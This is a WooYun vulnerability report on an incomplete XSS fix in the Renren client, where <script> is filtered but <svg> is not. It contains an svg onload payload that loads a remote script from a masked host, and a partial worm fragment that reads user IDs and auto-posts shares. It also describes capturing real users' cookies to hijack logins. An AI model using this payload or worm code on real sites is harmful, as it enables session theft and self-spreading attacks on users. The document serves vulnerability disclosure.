当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093115

漏洞标题:人人网客户端某漏洞修复不完善可导致蠕虫传播

相关厂商:人人网

漏洞作者: 路人甲

提交时间:2015-01-21 15:55

修复时间:2015-03-07 15:56

公开时间:2015-03-07 15:56

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-21: 细节已通知厂商并且等待厂商处理中
2015-01-21: 厂商已经确认,细节仅向厂商公开
2015-01-31: 细节向核心白帽子及相关领域专家公开
2015-02-10: 细节向普通白帽子公开
2015-02-20: 细节向实习白帽子公开
2015-03-07: 细节向公众公开

简要描述:

RT.新年快乐

详细说明:

根据WooYun-2014-83600
初步测试发现漏洞修复,然后发现是过滤了<script>关键字,但是没有过滤<svg>,仍旧能导致xss。第一次测试是在元旦过后没几天,看到细节公布了就去测试下,发现过滤不完善,以为虽然公布但是没有修复,然后今天又测了下发现还是那样子只过滤了script,那就应该是修复不完善了。

<svg/onload=document.body.appendChild(document.createElement(/script/.source)).src='http://XXXXXXXXX'>


Screenshot_2015-01-09-20-43-38.png


屏幕快照 2015-01-21 下午12.06.27.png


这是刚刚打到的cookie。等会就用这个测试劫持登陆

屏幕快照 2015-01-21 下午1.05.13.png


屏幕快照 2015-01-21 下午12.50.52.png


本来写了个蠕虫,后来看到 WooYun-2012-15078有人玩脱了....就萎了....话说以前校内的老接口都不能用了?

function getId()//获取ID
{
var quickExpr =/ruid\:\"([^\"]*)/g;  
var headhtml = window.document.head.innerHTML;
var re=quickExpr.exec(headhtml);
return re[1];
}
function share()//分享
{
 url="URL";
 data='';
 xmlHttp.open("post", url, false);
 xmlHttp.send(data);
}


然后是9号第一次测试打到的几个。

屏幕快照 2015-01-21 下午12.51.47.png


屏幕快照 2015-01-21 下午12.58.39.png


然后劫持登陆下试试

屏幕快照 2015-01-21 下午1.14.44.png

屏幕快照 2015-01-21 下午1.13.37.png


漏洞证明:

屏幕快照 2015-01-21 下午12.50.52.png


屏幕快照 2015-01-21 下午1.13.37.png

修复方案:

新年快乐,完善过滤机制。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-01-21 16:26

厂商回复:

谢谢了

最新状态:

暂无